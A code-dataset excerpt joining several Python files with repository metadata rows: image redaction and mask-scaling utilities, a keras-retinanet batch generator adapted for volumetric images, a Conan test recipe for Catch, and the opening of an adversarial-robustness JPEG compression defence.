    """Return a copy of *pil_img* with the polygon region(s) painted over.

    ``segmentation`` may be a single polygon (a flat coordinate list) or a
    list of such polygons; any other representation is rejected.
    """
    if type(segmentation) is not list:
        raise NotImplementedError
    # Normalise the input to a list of polygons.
    poly_list = segmentation if type(segmentation[0]) is list else [segmentation]
    redacted = pil_img.copy()
    drawer = ImageDraw.Draw(redacted)
    for polygon in poly_list:
        drawer.polygon(polygon, fill=fill, outline=outline)
    del drawer
    return redacted
def redact_img_mask(pil_img, bimask):
    """Return a copy of *pil_img* with every pixel where ``bimask == 1`` blacked out.

    :param pil_img: source PIL image (not modified)
    :param bimask: H x W binary mask aligned with the image
    """
    imarr = np.asarray(pil_img).copy()
    # Indexing with the (rows, cols) tuple zeroes all channels of the
    # selected pixels at once; the previous 3-channel tiled mask (mask3d)
    # was computed but never used, so it has been removed.
    imarr[np.where(bimask == 1)] = 0
    return Image.fromarray(imarr)
def blur_region(org_im, poly, radius=2):
    """Gaussian-blur only the polygonal region *poly* of *org_im*.

    The whole image is blurred once, then the blurred pixels are copied
    back onto the original restricted to the polygon's mask.

    :param org_im: source PIL image (not modified)
    :param poly: polygon as a flat sequence of (x, y) coordinates
    :param radius: Gaussian blur radius in pixels
    :return: new PIL image with only the region blurred
    """
    im = org_im.copy()
    # Blur the entire image
    blurred_image = im.filter(ImageFilter.GaussianBlur(radius=radius))
    blurred_im_array = np.asarray(blurred_image)
    # Generate a mask for the polygon (mode 'L', 1 inside, 0 outside)
    im_array = np.asarray(im).copy()
    mask_im = Image.new('L', (im_array.shape[1], im_array.shape[0]), 0)
    ImageDraw.Draw(mask_im).polygon(poly, outline=1, fill=1)
    mask = np.array(mask_im)
    # Copy this region from the blurred image on to the original
    im_array[mask.astype(bool)] = blurred_im_array[mask.astype(bool)]
    return Image.fromarray(im_array)
def fill_region(pil_img, poly, color='yellow'):
    """Return a copy of *pil_img* with polygon *poly* filled solid with *color*."""
    filled = pil_img.copy()
    drawer = ImageDraw.Draw(filled)
    drawer.polygon(poly, fill=color)
    del drawer
    return filled
def crop_region(org_im, poly, return_cropped=True, return_grayscale=False, bkg_fill=255):
    """Extract the polygonal region *poly* from *org_im* onto a plain background.

    :param org_im: source PIL image (not modified)
    :param poly: polygon as a flat sequence of (x, y) coordinates
    :param return_cropped: if True, crop the result to the mask's bounding box
    :param return_grayscale: if True, collapse RGB to luma values (the result
        is still converted back to RGB mode before returning)
    :param bkg_fill: fill value for pixels outside the polygon (255 = white)
    :return: new RGB PIL image containing only the selected region
    """
    im = org_im.copy()
    # Generate a mask for the polygon
    im_array = np.asarray(im).copy()
    mask_im = Image.new('L', (im_array.shape[1], im_array.shape[0]), 0)
    ImageDraw.Draw(mask_im).polygon(poly, outline=1, fill=1)
    mask = np.array(mask_im)
    new_im_array = np.ones_like(im_array) * bkg_fill
    # Copy the masked pixels from the original onto the plain background
    new_im_array[mask.astype(bool)] = im_array[mask.astype(bool)]
    # Instance is most likely surrounded by whitespace. Crop such that this is removed
    if return_cropped:
        min_i = np.where(np.sum(mask, axis=1) > 0)[0][0]  # First non-zero element when summed column-wise
        min_j = np.where(np.sum(mask, axis=0) > 0)[0][0]  # First non-zero element when summed row-wise
        max_i = np.where(np.sum(mask, axis=1) > 0)[0][-1]  # Last non-zero element when summed column-wise
        max_j = np.where(np.sum(mask, axis=0) > 0)[0][-1]  # Last non-zero element when summed row-wise
        new_im_array = new_im_array[min_i:max_i, min_j:max_j]
    if return_grayscale:
        new_im_array = np.dot(new_im_array[..., :3], [0.299, 0.587, 0.114])
    try:
        new_im = Image.fromarray(new_im_array)
    except ValueError:
        # NOTE(review): Python 2 print statements (this module is py2).
        # min_i/max_i/min_j/max_j are unbound here when return_cropped is
        # False, so this path would raise NameError instead of logging --
        # confirm before relying on it.
        print 'im_array.shape = ', im_array.shape
        print 'poly = ', poly
        print 'min_i, max_i, min_j, max_j = ', min_i, max_i, min_j, max_j
        print 'new_im_array.shape = ', new_im_array.shape
        raise
    if new_im.mode != 'RGB':
        new_im = new_im.convert('RGB')
    return new_im
def rgba_to_rgb(image, color=(255, 255, 255)):
    """Flatten an RGBA image onto a solid background color.

    The image is alpha-composited over an opaque RGB canvas of the given
    color, yielding a plain RGB image.
    Source: http://stackoverflow.com/a/9459208/284318
    Source: http://www.javacms.tech/questions/56660/convert-rgba-png-to-rgb-with-pil

    Keyword Arguments:
    image -- PIL RGBA Image object
    color -- Tuple r, g, b (default 255, 255, 255)
    """
    image.load()  # force decoding so the bands are available to split()
    canvas = Image.new('RGB', image.size, color)
    alpha_band = image.split()[3]  # band 3 is the alpha channel
    canvas.paste(image, mask=alpha_band)
    return canvas
def seg_to_adj(X):
    """
    Convert a matrix of labels to an adjacency matrix.

    Two labels are adjacent iff they occur in horizontally or vertically
    neighbouring cells of X (a label that neighbours itself, which always
    happens for multi-cell segments, gets a 1 on the diagonal). Labels are
    assumed to be the integers 0..n-1, as SLIC produces.
    https://stackoverflow.com/questions/26486898/matrix-of-labels-to-adjacency-matrix
    :param X: Matrix of labels (like ones produced by SLIC)
    :return: n x n adjacency matrix
    """
    n = len(np.unique(X))
    # np.int was removed in NumPy 1.24; the builtin int is its exact
    # equivalent (np.int was always an alias for the builtin).
    G = np.zeros((n, n), dtype=int)
    # left-right pairs
    G[X[:, :-1], X[:, 1:]] = 1
    # right-left pairs
    G[X[:, 1:], X[:, :-1]] = 1
    # top-bottom pairs
    G[X[:-1, :], X[1:, :]] = 1
    # bottom-top pairs
    G[X[1:, :], X[:-1, :]] = 1
    return G
def dilate_mask(_seg, _mask, c):
    """
    Dilate a binary mask by a factor of c, guided by the SLIC label matrix _seg.

    First snaps the mask to superpixels (keeping only superpixels with >25%
    overlap), then greedily grows it one whole superpixel at a time -- always
    picking an outside superpixel with the most edges to the current mask --
    until the pixel count reaches c times the original.

    NOTE(review): this body is Python 2 code -- np.max(map(...)) and the
    later filter(...) rely on map/filter returning lists; on Python 3 they
    return iterators and np.max(map(...)) fails.

    :param _seg: N x M superpixel assignment matrix (labels 0..n-1)
    :param _mask: N x M binary mask
    :param c: dilation factor (>= 1.0)
    :return: N x M dilated binary mask
    """
    if c < 1.0:
        raise ValueError('c needs to be >=1.0')
    _mask = _mask.copy()
    cur_pixels = np.sum(_mask)
    # Cap the target at the image area so the growth loop can terminate.
    target_pixels = min(c * cur_pixels, _mask.size)
    vrts_all = set(np.unique(_seg))
    vrts_in_mask = set(np.unique(_mask * _seg))  # in-vert
    # First add all segments containing seed pixels with >25% overlap
    # overlap_vrts = np.unique(segments * new_bimask)
    for _v in list(vrts_in_mask):
        # Add this vertex only if it overlaps > 25%
        # Pixels in this superpixel
        n_sup_pix = np.sum(_seg == _v)
        # Pixels in overlap (float so the ratio below is not integer division)
        n_overlap = np.sum(np.logical_and(_mask == 1, _seg == _v)).astype(np.float32)
        if n_overlap / n_sup_pix > 0.25:
            _mask[np.where(_seg == _v)] = 1.0
        else:
            vrts_in_mask.remove(_v)
    cur_pixels = np.sum(_mask)
    A = seg_to_adj(_seg)
    # Greedy growth: one superpixel per iteration until target area reached.
    while cur_pixels < target_pixels:
        # for _i in range(2):
        vrts_outside_mask = vrts_all - vrts_in_mask  # out-vert
        # Choose a single vrt from vrts_outside_mask to add to set
        # For each out-vert get a count of how many edges it has to an in-vert
        candidates = []  # List of (_v, _ne) where _ne = # edges with an in-vert
        for _v in vrts_outside_mask:
            adj_vrts = set(np.where(A[_v] > 0)[0])
            _ne = len(vrts_in_mask & adj_vrts)
            candidates.append((_v, _ne))
        # Choose the best candidate (ties broken randomly below)
        candidates = sorted(candidates, key=lambda x: -x[1])
        max_ne = np.max(map(lambda x: x[1], candidates))  # What's the highest no. of edges for any node?
        candidates = filter(lambda x: x[1] == max_ne, candidates)  # Filter vertices with these many edges
        candidates_v = [x[0] for x in candidates]
        best_v = np.random.choice(candidates_v)
        vrts_in_mask.add(best_v)
        # Add this vertex to mask
        _mask[np.where(_seg == best_v)] = 1.0
        cur_pixels = np.sum(_mask)
    return _mask
def contract_mask(_seg, _mask, c):
    """
    Shrink a binary mask to a fraction c of its area, guided by the SLIC
    label matrix _seg.

    Contraction is posed as the dual problem: dilate the complement of the
    mask by the equivalent factor, then complement the result again.

    :param _seg: N x M superpixel assignment matrix
    :param _mask: N x M binary mask
    :param c: contraction factor (<= 1.0)
    :return: N x M contracted binary mask
    """
    if c > 1.0:
        raise ValueError('c needs to be <=1.0')
    target_pixels = c * np.sum(_mask)
    total_pixels = float(_mask.size)
    # Complement of the mask: 1 outside the region, 0 inside.
    complement = (_mask == 0).astype(int)
    # Express the shrink factor as the equivalent growth factor for the
    # complement's area.
    growth = (total_pixels - target_pixels) / float(np.sum(complement))
    grown_complement = dilate_mask(_seg, complement, growth)
    return (grown_complement == 0).astype(np.uint8)
def resize_bimask(bimask, max_len=1000.):
    """Resize a binary mask so its longer side is ``max_len`` pixels, keeping
    the aspect ratio.

    NOTE(review): relies on scipy.misc.imresize, which was deprecated and
    removed in SciPy 1.3 -- this module is pinned to an old SciPy. imresize
    also rescales values to the 0-255 range, so the output is not strictly
    0/1 despite the astype back to the input dtype; confirm callers expect
    that.

    :param bimask: H x W binary mask
    :param max_len: target length of the longer side, in pixels
    :return: resized mask with the same dtype as the input
    """
    org_h, org_w = bimask.shape
    max_len = float(max_len)
    if org_w > org_h:
        new_w = max_len
        new_h = (new_w / org_w) * org_h
    else:
        new_h = max_len
        new_w = (new_h / org_h) * org_w
    new_w, new_h = int(new_w), int(new_h)
    new_bimask = imresize(bimask, (new_h, new_w)).astype(bimask.dtype)
    return new_bimask
def scale_mask(im, bimask, c, n_segments=200, smoothen=True):
    """
    Scale bimask for image im by a factor c.

    Pipeline: downscale image+mask (SLIC is expensive at full resolution),
    compute SLIC superpixels, dilate (c > 1) or contract (c < 1) the mask
    along superpixel boundaries, optionally smooth the result with repeated
    Gaussian blurs, then upscale back to the original image size.

    NOTE(review): imresize rescales mask values to 0-255, while
    dilate_mask/contract_mask test ``_mask == 1`` -- verify the low-res mask
    actually carries the values those helpers expect.

    :param im: PIL image the mask belongs to
    :param bimask: H x W binary mask aligned with im
    :param c: scale factor (1.0 leaves the mask area unchanged)
    :param n_segments: number of SLIC superpixels to request
    :param smoothen: if True, smooth the mask boundary before upscaling
    :return: scaled binary mask at the original image resolution
    """
    # Resize image so that SLIC is faster
    # Resize image to a lower size (longer side = 1000 px, aspect kept)
    org_w, org_h = im.size
    max_len = 1000.
    if org_w > org_h:
        new_w = max_len
        new_h = (new_w / org_w) * org_h
    else:
        new_h = max_len
        new_w = (new_h / org_h) * org_w
    new_w, new_h = int(new_w), int(new_h)
    new_im = im.resize((new_w, new_h))
    new_bimask = imresize(bimask, (new_h, new_w))
    segments = slic(new_im, n_segments=n_segments, slic_zero=True)
    if c > 1.:
        scaled_mask = dilate_mask(segments, new_bimask, c)
    elif c < 1.:
        scaled_mask = contract_mask(segments, new_bimask, c)
    else:
        scaled_mask = new_bimask
    if smoothen:
        # Repeated Gaussian blurs then a 50% threshold round off the
        # blocky superpixel boundary.
        smooth_bimask = Image.fromarray(scaled_mask.astype('uint8') * 255)
        for i in range(10):
            smooth_bimask = smooth_bimask.filter(ImageFilter.GaussianBlur)
        scaled_mask = np.asarray(smooth_bimask) > 128
        scaled_mask = scaled_mask.astype('uint8')
    # Rescale this mask to original size (nearest keeps it binary)
    scaled_mask_highres = imresize(scaled_mask, (org_h, org_w), interp='nearest')
    del new_im
    del new_bimask
    del scaled_mask
    return scaled_mask_highres
| 29.558897 | 106 | 0.637443 |
f8f5d29809059157b48c92105d0c4b7eb538d214 | 18,493 | py | Python | keras_retinanet/preprocessing/generator.py | wawancenggoro/i3d_lung_nodule_detection_ori | e5e6fcd89603fb22a9926ad0930448fb493d5647 | [
"Apache-2.0"
] | 1 | 2019-03-02T07:15:58.000Z | 2019-03-02T07:15:58.000Z | keras_retinanet/preprocessing/generator.py | wawancenggoro/i3d_lung_nodule_detection_ori | e5e6fcd89603fb22a9926ad0930448fb493d5647 | [
"Apache-2.0"
] | null | null | null | keras_retinanet/preprocessing/generator.py | wawancenggoro/i3d_lung_nodule_detection_ori | e5e6fcd89603fb22a9926ad0930448fb493d5647 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import random
import warnings
import keras
from ..utils.anchors import (
anchor_targets_bbox,
anchors_for_shape,
guess_shapes
)
from ..utils.config import parse_anchor_parameters
from ..utils.image import (
TransformParameters,
adjust_transform_for_image,
apply_transform,
preprocess_image,
resize_image,
)
from ..utils.transform import transform_aabb
class Generator(keras.utils.Sequence):
""" Abstract generator class.
"""
def __init__(
self,
transform_generator = None,
batch_size=1,
group_method='ratio', # one of 'none', 'random', 'ratio'
shuffle_groups=True,
image_min_side=512,
image_max_side=512,
# image_min_side=800,
# image_max_side=1333,
transform_parameters=None,
compute_anchor_targets=anchor_targets_bbox,
compute_shapes=guess_shapes,
preprocess_image=preprocess_image,
config=None
):
""" Initialize Generator object.
Args
transform_generator : A generator used to randomly transform images and annotations.
batch_size : The size of the batches to generate.
group_method : Determines how images are grouped together (defaults to 'ratio', one of ('none', 'random', 'ratio')).
shuffle_groups : If True, shuffles the groups each epoch.
image_min_side : After resizing the minimum side of an image is equal to image_min_side.
image_max_side : If after resizing the maximum side is larger than image_max_side, scales down further so that the max side is equal to image_max_side.
transform_parameters : The transform parameters used for data augmentation.
compute_anchor_targets : Function handler for computing the targets of anchors for an image and its annotations.
compute_shapes : Function handler for computing the shapes of the pyramid for a given input.
preprocess_image : Function handler for preprocessing an image (scaling / normalizing) for passing through a network.
"""
self.transform_generator = transform_generator
self.batch_size = int(batch_size)
self.group_method = group_method
self.shuffle_groups = shuffle_groups
self.image_min_side = image_min_side
self.image_max_side = image_max_side
self.transform_parameters = transform_parameters or TransformParameters()
self.compute_anchor_targets = compute_anchor_targets
self.compute_shapes = compute_shapes
self.preprocess_image = preprocess_image
self.config = config
# Define groups
self.group_images()
# Shuffle when initializing
if self.shuffle_groups:
self.on_epoch_end()
def on_epoch_end(self):
if self.shuffle_groups:
random.shuffle(self.groups)
def size(self):
""" Size of the dataset.
"""
raise NotImplementedError('size method not implemented')
def num_classes(self):
""" Number of classes in the dataset.
"""
raise NotImplementedError('num_classes method not implemented')
def has_label(self, label):
""" Returns True if label is a known label.
"""
raise NotImplementedError('has_label method not implemented')
def has_name(self, name):
""" Returns True if name is a known class.
"""
raise NotImplementedError('has_name method not implemented')
def name_to_label(self, name):
""" Map name to label.
"""
raise NotImplementedError('name_to_label method not implemented')
def label_to_name(self, label):
""" Map label to name.
"""
raise NotImplementedError('label_to_name method not implemented')
def image_aspect_ratio(self, image_index):
    """ Compute the aspect ratio for an image with image_index.

    Abstract: used as the sort key when group_method == 'ratio'
    (see group_images).
    """
    raise NotImplementedError('image_aspect_ratio method not implemented')
def load_image(self, image_index):
    """ Load an image at the image_index.

    Abstract: concrete subclasses must return the image array for the index.
    """
    raise NotImplementedError('load_image method not implemented')
def load_annotations(self, image_index):
    """ Load annotations for an image_index.

    Abstract: must return a dict with at least the keys 'labels', 'bboxes'
    and 'depths' (enforced by load_annotations_group).
    """
    raise NotImplementedError('load_annotations method not implemented')
def load_annotations_group(self, group):
    """Load and validate annotations for every image index in *group*.

    Each entry must be a dict containing 'labels', 'bboxes' and 'depths'.
    """
    annotations_group = [self.load_annotations(image_index) for image_index in group]
    for annotations in annotations_group:
        assert(isinstance(annotations, dict)), '\'load_annotations\' should return a list of dictionaries, received: {}'.format(type(annotations))
        # Same required-key check for all three keys (including depths).
        for key in ('labels', 'bboxes', 'depths'):
            assert(key in annotations), '\'load_annotations\' should return a list of dictionaries that contain \'labels\', \'depths\', and \'bboxes\'.'
    return annotations_group
def filter_annotations(self, image_group, annotations_group, group):
    """ Filter annotations by removing those that are outside of the image bounds or whose width/height < 0.

    Mutates annotations_group in place (np.delete per key) and returns both
    groups. Boxes are [x1, y1, x2, y2].
    """
    # test all annotations
    for index, (image, annotations) in enumerate(zip(image_group, annotations_group)):
        # NOTE(review): the original (commented-out upstream) version bounded
        # x2/y2 by image.shape[1]/shape[0], i.e. a 3-D HWC image.  This
        # variant uses shape[2]/shape[1], which matches a 4-D sample with a
        # leading frame axis (F, H, W, C) -- presumably for video input;
        # TODO confirm against load_image.
        invalid_indices = np.where(
            (annotations['bboxes'][:, 2] <= annotations['bboxes'][:, 0]) |
            (annotations['bboxes'][:, 3] <= annotations['bboxes'][:, 1]) |
            (annotations['bboxes'][:, 0] < 0) |
            (annotations['bboxes'][:, 1] < 0) |
            (annotations['bboxes'][:, 2] > image.shape[2]) |
            (annotations['bboxes'][:, 3] > image.shape[1])
        )[0]
        # delete invalid indices (warn so bad ground truth is visible in logs)
        if len(invalid_indices):
            warnings.warn('Image with id {} (shape {}) contains the following invalid boxes: {}.'.format(
                group[index],
                image.shape,
                annotations['bboxes'][invalid_indices, :]
            ))
            # Drop the same rows from every annotation array (labels, bboxes, depths).
            for k in annotations_group[index].keys():
                annotations_group[index][k] = np.delete(annotations[k], invalid_indices, axis=0)
    return image_group, annotations_group
def load_image_group(self, group):
    """Load the image for each index in *group*, returned as a list."""
    return list(map(self.load_image, group))
def random_transform_group_entry(self, image, annotations, transform=None):
    """ Randomly transforms image and annotation.

    When *transform* is None, a random transform is drawn from
    self.transform_generator. The 'bboxes' array is copied before being
    rewritten, so the caller's original array is not mutated.

    NOTE(review): transform is indexed as transform[1] (applied to the
    image) and transform[0] (applied to each box), so it is presumably a
    2-element pair produced by adjust_transform_for_image -- confirm
    against that helper, which is defined elsewhere.
    """
    # randomly transform both image and annotations
    if transform is not None or self.transform_generator:
        if transform is None:
            transform = adjust_transform_for_image(next(self.transform_generator), image, self.transform_parameters.relative_translation)
        # apply transformation to image
        image = apply_transform(transform[1], image, self.transform_parameters)
        # Transform the bounding boxes in the annotations.
        annotations['bboxes'] = annotations['bboxes'].copy()
        for index in range(annotations['bboxes'].shape[0]):
            annotations['bboxes'][index, :] = transform_aabb(transform[0], annotations['bboxes'][index, :])
    return image, annotations
def random_transform_group(self, image_group, annotations_group):
    """Apply a random transform to every image/annotations pair, in place."""
    assert(len(image_group) == len(annotations_group))
    for idx, (image, annotations) in enumerate(zip(image_group, annotations_group)):
        image_group[idx], annotations_group[idx] = self.random_transform_group_entry(image, annotations)
    return image_group, annotations_group
def resize_image(self, image):
    """ Resize an image using image_min_side and image_max_side.

    Delegates to the module-level resize_image() helper (same name as this
    method). Returns (resized_image, scale) -- presumed from the caller in
    preprocess_group_entry; confirm against the helper's definition.
    """
    return resize_image(image, min_side=self.image_min_side, max_side=self.image_max_side)
def preprocess_group_entry(self, image, annotations):
    """ Preprocess image and its annotations.

    Returns the preprocessed/resized image and the annotations with bboxes
    rescaled to match. Note: annotations['bboxes'] is scaled in place.
    """
    # preprocess the image (scaling / normalizing, per the configured handler)
    image = self.preprocess_image(image)
    # resize image
    image, image_scale = self.resize_image(image)
    # apply resizing to annotations too (in-place multiply)
    annotations['bboxes'] *= image_scale
    # convert to the wanted keras floatx
    image = keras.backend.cast_to_floatx(image)
    return image, annotations
def preprocess_group(self, image_group, annotations_group):
    """Run preprocess_group_entry over every image/annotations pair, in place."""
    assert(len(image_group) == len(annotations_group))
    for idx, (image, annotations) in enumerate(zip(image_group, annotations_group)):
        image_group[idx], annotations_group[idx] = self.preprocess_group_entry(image, annotations)
    return image_group, annotations_group
def group_images(self):
    """Partition image indices into batches of self.batch_size.

    Ordering follows self.group_method ('random', 'ratio', or natural order);
    the final batch wraps around so every group is full-sized.
    """
    # determine the order of the images
    order = list(range(self.size()))
    if self.group_method == 'random':
        random.shuffle(order)
    elif self.group_method == 'ratio':
        order.sort(key=self.image_aspect_ratio)

    # divide into groups, one group = one batch (wrap with modulo)
    groups = []
    for start in range(0, len(order), self.batch_size):
        groups.append([order[i % len(order)] for i in range(start, start + self.batch_size)])
    self.groups = groups
def compute_inputs(self, image_group):
""" Compute inputs for the network using an image_group.
"""
# get the max image shape
# max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(3))
# import IPython;IPython.embed()
# i=0
max_shape_list=[]
max_shape_array=[]
# for i in range (len(image_group[0])):
max_shape = tuple(max(image.shape[x] for image in image_group) for x in range(4))
# max_shape = tuple(max(image_group[0].shape[x] for image in image_group[0]) for x in range(3))
# max_shape_conv = list(max_shape)
# max_shape_list.append(max_shape)
# i+1
# max_shape_conclusion = list(max(max_shape_list,key=lambda item:item[1]))
# num_max_shape_array=len(max_shape_list)
# max_shape_array=max_shape_conclusion
# max_shape_array.insert(0, num_max_shape_array)
# max_shape_array=tuple(max_shape_array)
# max_shape_array= tuple(num_max_shape_array, max_shape_conclusion[0], max_shape_conclusion[1], max_shape_conclusion[2])
# max_shape_array=np.stack((max_shape_list[0], max_shape_list[1], max_shape_list[2], max_shape_list[3], max_shape_list[4], max_shape_list[5], max_shape_list[6], max_shape_list[7], max_shape_list[8], max_shape_list[9],
# max_shape_list[10], max_shape_list[11], max_shape_list[12], max_shape_list[13], max_shape_list[14], max_shape_list[15], max_shape_list[16], max_shape_list[17], max_shape_list[18], max_shape_list[19],
# max_shape_list[20], max_shape_list[21], max_shape_list[22], max_shape_list[23], max_shape_list[24], max_shape_list[25], max_shape_list[26], max_shape_list[27], max_shape_list[28], max_shape_list[29],
# max_shape_list[30], max_shape_list[31]), axis=0)
# print('max_shape')
# import IPython;IPython.embed()
# construct an image batch object
image_batch = np.zeros((self.batch_size,) + max_shape, dtype=keras.backend.floatx())
# print('construct an image batch object')
# import IPython;IPython.embed()
# copy all images to the upper left part of the image batch object
# image_batch[image_index, :image.shape[0], :image.shape[1], :image.shape[2]] = image
for image_index, image in enumerate(image_group):
# import IPython;IPython.embed()
# for i in range (len(image)):
image_batch[image_index, :image.shape[0], :image.shape[1], :image.shape[2], :image.shape[3]] = image
# print('copy all image')
# import IPython;IPython.embed()
if keras.backend.image_data_format() == 'channels_first':
image_batch = image_batch.transpose((0, 4, 1, 2, 3))
# import IPython;IPython.embed()
return image_batch
def generate_anchors(self, image_shape):
    """Build the anchor grid for *image_shape*.

    Honours an 'anchor_parameters' override in self.config when present;
    parse_anchor_parameters / anchors_for_shape are defined elsewhere.
    """
    anchor_params = None
    if self.config and 'anchor_parameters' in self.config:
        anchor_params = parse_anchor_parameters(self.config)
    return anchors_for_shape(image_shape, anchor_params=anchor_params, shapes_callback=self.compute_shapes)
def compute_targets(self, image_group, annotations_group):
    """ Compute target outputs for the network using images and their annotations.
    """
    # get the max image shape
    # NOTE(review): the maximum is taken over the elements of the *first*
    # sample only (image_group[0]) -- i.e. over its frames, range(3) giving
    # an (H, W, C)-like shape. This presumes every sample in the group has
    # the same per-frame shape; confirm against compute_inputs, which pads
    # over the whole group.
    max_shape = tuple(max(image.shape[x] for image in image_group[0]) for x in range(3))

    anchors = self.generate_anchors(max_shape)
    batches = self.compute_anchor_targets(
        anchors,
        image_group,
        annotations_group,
        self.num_classes()
    )
    return list(batches)
def compute_input_output(self, group):
    """ Compute inputs and target outputs for the network.

    Runs the full per-batch pipeline:
    load -> filter -> random transform -> preprocess -> batch inputs/targets.

    Args:
        group: list of image indices forming one batch.

    Returns:
        Tuple (inputs, targets) ready to feed to the network.
    """
    # load images and annotations
    image_group = self.load_image_group(group)
    annotations_group = self.load_annotations_group(group)

    # check validity of annotations (drops out-of-bounds / degenerate boxes)
    image_group, annotations_group = self.filter_annotations(image_group, annotations_group, group)

    # randomly transform data (augmentation)
    image_group, annotations_group = self.random_transform_group(image_group, annotations_group)

    # perform preprocessing steps (normalisation, resizing, dtype cast)
    image_group, annotations_group = self.preprocess_group(image_group, annotations_group)

    # compute network inputs and anchor targets
    inputs = self.compute_inputs(image_group)
    targets = self.compute_targets(image_group, annotations_group)

    return inputs, targets
def __len__(self):
    """
    Number of batches for generator.

    One group == one batch (see group_images); presumably consumed by the
    Keras Sequence protocol to size an epoch -- base class not visible here.
    """
    return len(self.groups)
def __getitem__(self, index):
    """
    Keras sequence method for generating batches.

    Args:
        index: batch index in [0, len(self)).

    Returns:
        Tuple (inputs, targets) for the requested batch.
    """
    group = self.groups[index]
    inputs, targets = self.compute_input_output(group)
    return inputs, targets
| 42.125285 | 225 | 0.635592 |
fec93b3c93e8dea0f507d2f08bc15bfca3f4631d | 574 | py | Python | test_package/conanfile.py | FromAlaska/CS372Proj1 | 36091b033b8166a6f1ec93f5915f49430b995c3e | [
"BSL-1.0"
] | 3 | 2020-05-09T17:21:06.000Z | 2020-11-25T07:14:54.000Z | test_package/conanfile.py | FromAlaska/CS372Proj1 | 36091b033b8166a6f1ec93f5915f49430b995c3e | [
"BSL-1.0"
] | null | null | null | test_package/conanfile.py | FromAlaska/CS372Proj1 | 36091b033b8166a6f1ec93f5915f49430b995c3e | [
"BSL-1.0"
] | null | null | null | #!/usr/bin/env python
from os import getenv
from os import path
from conans import ConanFile
from conans import CMake
class CatchConanTest(ConanFile):
generators = "cmake"
settings = "os", "compiler", "arch", "build_type"
username = getenv("CONAN_USERNAME", "philsquared")
channel = getenv("CONAN_CHANNEL", "testing")
requires = "Catch/2.1.2@%s/%s" % (username, channel)
def build(self):
cmake = CMake(self)
cmake.configure(build_dir="./")
cmake.build()
def test(self):
self.run(path.join("bin", "CatchTest"))
| 26.090909 | 56 | 0.648084 |
f0f232ef1c6040a4421f4c69e1c2e73f55f32fa1 | 8,534 | py | Python | art/defences/preprocessor/jpeg_compression.py | mcguires5/adversarial-robustness-toolbox | f8b0552859eaf31c5b66e1d14d28b89178795ad0 | [
"MIT"
] | 1 | 2020-07-12T03:45:23.000Z | 2020-07-12T03:45:23.000Z | art/defences/preprocessor/jpeg_compression.py | mcguires5/adversarial-robustness-toolbox | f8b0552859eaf31c5b66e1d14d28b89178795ad0 | [
"MIT"
] | 105 | 2020-08-24T06:15:43.000Z | 2022-03-24T08:03:16.000Z | art/defences/preprocessor/jpeg_compression.py | mcguires5/adversarial-robustness-toolbox | f8b0552859eaf31c5b66e1d14d28b89178795ad0 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2018
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module implements the JPEG compression defence `JpegCompression`.
| Paper link: https://arxiv.org/abs/1705.02900, https://arxiv.org/abs/1608.00853
| Please keep in mind the limitations of defences. For more information on the limitations of this defence, see
https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general, see
https://arxiv.org/abs/1902.06705
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from io import BytesIO
import logging
from typing import Optional, Tuple
import numpy as np
from tqdm import tqdm
from art.config import ART_NUMPY_DTYPE, CLIP_VALUES_TYPE
from art.defences.preprocessor.preprocessor import Preprocessor
from art.utils import Deprecated, deprecated_keyword_arg
logger = logging.getLogger(__name__)
class JpegCompression(Preprocessor):
    """
    Implement the JPEG compression defence approach.

    | Paper link: https://arxiv.org/abs/1705.02900, https://arxiv.org/abs/1608.00853

    | Please keep in mind the limitations of defences. For more information on the limitations of this defence,
        see https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general, see
        https://arxiv.org/abs/1902.06705
    """

    params = ["quality", "channel_index", "channels_first", "clip_values"]

    @deprecated_keyword_arg("channel_index", end_version="1.5.0", replaced_by="channels_first")
    def __init__(
        self,
        clip_values: CLIP_VALUES_TYPE,
        quality: int = 50,
        channel_index=Deprecated,
        channels_first: bool = False,
        apply_fit: bool = True,
        apply_predict: bool = True,
    ):
        """
        Create an instance of JPEG compression.

        :param clip_values: Tuple of the form `(min, max)` representing the minimum and maximum values allowed
               for features.
        :param quality: The image quality, on a scale from 1 (worst) to 95 (best). Values above 95 should be avoided.
        :param channel_index: Index of the axis in data containing the color channels or features.
        :type channel_index: `int`
        :param channels_first: Set channels first or last.
        :param apply_fit: True if applied during fitting/training.
        :param apply_predict: True if applied during predicting.
        """
        # Remove in 1.5.0 -- translate the deprecated channel_index argument
        # into the channels_first flag.
        if channel_index == 3:
            channels_first = False
        elif channel_index == 1:
            channels_first = True
        elif channel_index is not Deprecated:
            raise ValueError("Not a proper channel_index. Use channels_first.")

        super(JpegCompression, self).__init__()
        self._is_fitted = True
        self._apply_fit = apply_fit
        self._apply_predict = apply_predict
        self.quality = quality
        self.channel_index = channel_index
        self.channels_first = channels_first
        self.clip_values = clip_values
        self._check_params()

    @property
    def apply_fit(self) -> bool:
